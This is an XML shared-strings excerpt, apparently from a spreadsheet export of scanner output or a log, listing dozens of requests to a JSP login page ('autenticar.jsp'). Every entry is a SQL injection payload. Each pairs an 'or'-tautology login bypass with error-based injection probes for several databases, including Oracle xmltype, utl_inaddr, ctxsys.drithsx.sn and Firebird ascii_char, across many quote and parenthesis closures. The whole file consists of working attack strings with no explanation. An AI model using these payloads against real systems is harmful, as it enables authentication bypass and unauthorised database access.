  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"uqam"="uqam&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("pyvc"like"pyvc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("jypn"like"jypn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("bhpi"like"bhpi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2420in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(2420=2420)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"qrem"like"qrem&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(5577=5577&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((1816=1816&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(((7233=7233&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('jiab'='jiab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('luol'='luol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('rdus'='rdus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'zats'='zats&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('eikv'like'eikv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('xbmx'like'xbmx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('cnhy'like'cnhy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'ltet'like'ltet&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("ltoj"="ltoj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("uqzg"="uqzg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("tmwd"="tmwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"yqbr"="yqbr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("ucmp"like"ucmp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("pyeb"like"pyeb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("asxm"like"asxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and878=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(878=878)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"nvot"like"nvot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(51=51&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((6332=6332&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(((1507=1507&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('nndz'='nndz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('aytx'='aytx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('gtpb'='gtpb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'powi'='powi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('ibtq'like'ibtq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('fpsr'like'fpsr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('esgb'like'esgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'ktor'like'ktor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("ekcy"="ekcy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("vatz"="vatz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("itfk"="itfk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"svau"="svau&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("uzob"like"uzob&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("vtll"like"vtll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("kmqw"like"kmqw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3753=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3753=3753)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"regb"like"regb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(1776=1776&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((2353=2353&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(((8424=8424&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('hsju'='hsju&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('tefx'='tefx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('ybhv'='ybhv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'ojjm'='ojjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('utzy'like'utzy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('olwr'like'olwr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('xxdx'like'xxdx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'kmrj'like'kmrj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("nova"="nova&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("rrzx"="rrzx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("sdgt"="sdgt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"bspu"="bspu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("mvex"like"mvex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("ousk"like"ousk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("ocrp"like"ocrp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and988=ctxsys.drithsx.sn(988,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(988=988)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"kvpc"like"kvpc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
